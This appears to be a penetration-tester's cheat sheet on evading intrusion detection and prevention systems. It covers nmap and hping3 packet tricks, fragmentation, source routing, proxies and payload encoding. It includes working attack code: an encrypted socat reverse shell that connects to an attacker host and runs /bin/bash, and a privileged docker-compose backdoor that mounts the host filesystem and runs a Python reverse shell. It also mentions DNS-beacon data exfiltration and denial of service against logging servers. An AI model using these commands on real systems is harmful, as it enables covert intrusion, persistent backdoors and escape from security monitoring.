# IDS & IPS Evation * Evation by manipulation of * Tool parameters * Protocol * Payload * Route * Or DoS ## Enumeration * [User-Agents](https://developers.whatismybrowser.com/useragents/explore/) ### nmap * `--script-args http.useragent=""` * `-Ss` half open ### nikto * `-useragent ` * Tuning `-T 1 2 3` * __NOT__`-evasion `, it increases detection ## Protocol Manipulation ### Relying on another protocol * `nc -ulvnp 4711` for listening to incoming UDP traffic * `nc -u $TARGET_IP $TARGET_PORT` for connecting through UDP ### Manipulation of the source's or LHOST's network port * `nmap -g 80` or `nmap --source-port 53` to send outgoing nmap traffic through it ### Session splicing by fragmentation and segmentation * `nmap` fragmentation in 8 bytes `-f`, 16 bytes `-ff`, `--mtu ` for MTU * Use [Fragroute](https://www.monkey.org/~dugsong/fragroute/) with `ip_frag ` in `fragroute.conf`, then use `fragroute -f fragroute.conf $TARGET_IP` ### Sending invalid packets * Invalid protocol header flags and checksums via`nmap --badsum`, `nmap --scanflags URG/ACK/PSH/RST/SYN/FIN`, e.g. concatentation of multiple flags `nmap --scanflags SYNRSTFIN` * `hping3` including `--ttl`, `--badsum`, header flags `-S`,`-A`,`-P`,`-U`,`-F`,`-R` ## Payload Manipulation ### Obfuscation and Encoding * Base64 * URL * Escaped Unicode Characters ### Encrypting Communication Channels * Use socat with encryption ```sh openssl req -x509 -newkey rsa:2048 -days 356 -subj '/CN=www.example.com/O=YO/C=FR' -nodes -keyout id_rsa.key -out reverse.crt ``` * Create `.pem` (Privacy Enhanced Mail) file via ``` cat id_rsa.key reverse.crt > reverse.pem ``` * Listening on attacker side ```sh socat -d -d OPENSSL-LISTEN:4711,cert=reverse.pem,verify=0,fork STDOUT ``` * On target ```sh socat OPENSSL:$ATTACKER_IP:4711,verify=0 EXEC:/bin/bash ``` ### Modification of Data * Order of parameters, instead of `nc -lvnp` it is `nc -vpnl` * Adding whitespaces to the commands * Use aliases ## Route Manipulation ### Relying on Source Routing * `nmap --ip-options "L 10.10.20.30 10.10.30.40` routes through these IPs loosely * `nmap --ip-options "S 10.10.20.30 10.10.30.40"` routes through the IPs strictly ### Using Proxyy Servers * `nmap -sS http://$PROXY1:80,socks4://$PROXY:8080 $TARGET_IP` ## Tactical DoS * Non malicious, benign traffic against * IDS/IPS * Logging server ## MISC * Changing * `User-Agent` * Request frequency and duration of sleep * SSL/TLS certs * DNS beacon, storing exfiltrated data in the query ## Backdoors * Backdooring without getting recognized by the IDS/IPS by reading its rules in the config file ### Docker * Create a `docker-compose.yaml` file with a reverse shell as an entry point, mount the host volume to `/mnt` inside the container ```yaml --- version: "2.1" services: backdoorservice: restart: always image: entrypoint: > python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("<$ATTACKER_IP>",4711));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2); pty.spawn("/bin/sh")' volumes: - /:/mnt privileged: true ```